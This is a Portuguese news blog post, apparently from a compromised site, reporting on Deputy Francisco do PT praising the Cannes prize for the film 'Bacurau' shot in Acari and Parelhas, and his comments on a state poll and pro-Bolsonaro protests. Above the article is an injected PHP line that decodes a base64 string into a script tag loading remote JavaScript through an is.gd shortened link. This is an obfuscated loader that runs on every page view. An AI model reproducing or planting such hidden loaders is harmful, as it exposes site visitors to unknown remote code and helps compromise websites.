$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Deputado Francisco do PT enaltece premiação em Cannes de filme rodado em Parelhas e Acari

Deputado Francisco do PT enaltece premiação em Cannes de filme rodado em Parelhas e Acari
29 Mai 2019

O filme brasileiro “Bacurau” ganhou o prêmio do júri no Festival de Cannes neste sábado (25). Na sessão plenária da Assembleia Legislativa nesta terça-feira (28), o deputado Francisco do PT enalteceu o longa-metragem, que foi filmado em Acari e Parelhas e tem a participação da população local na figuração.

“No segundo semestre, as cidades de Acari e Parelhas, principalmente a comunidade de Barra, um lugar com apenas 150 habitantes, estarão nos cinemas de todo o Brasil. As gravações feitas no local movimentaram a economia e levantaram a autoestima da população”, conta o parlamentar.

Em aparte, o deputado Hermano Morais (MDB) disse que o filme pode ser uma oportunidade para interiorizar o turismo da região. “A escolha desta região mostra que temos beleza no interior do Rio Grande do Norte”.

O filme brasileiro é uma produção dos cineastas pernambucanos Kleber Mendonça Filho e Juliano Dornelles, que percorreram diversos estados nordestinos até encontrar o local perfeito para as gravações. No longa, estrelado por Sônia Braga, Bacurau é nome de um pequeno povoado do sertão brasileiro, que desaparece do mapa depois que Dona Carmelita, de 94 anos, morre.  

Pesquisa

Durante seu pronunciamento, o deputado comentou a pesquisa Consult/Fiern sobre a avaliação dos governos de Fátima Bezerra (PT) e Jair Bolsonaro (PSL). Os dados mostram que 55% da população do RN aprovam o Governo Fátima, contra 23% que desaprovam. Já o Governo Bolsonaro é aprovado por 25% da população do Estado, contra 60% que desaprovam. “O Governo Fátima não é perfeito, precisa melhorar em vários aspectos, mas a população está satisfeita com as ações até aqui”, disse ele.

Francisco do PT ainda criticou as manifestações pró-Bolsonaro, ocorridas no último domingo (26), quando apoiadores do presidente, segundo ele, “pediam o fechamento do Congresso Nacional, desmoralizaram instituições como o STF e  fizeram a demonização dos políticos”. O assunto foi levantado, após o pronunciamento do Coronel Azevedo (PSL), quando ele disse que o Governo Fátima era antidemocrático e comete censura.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *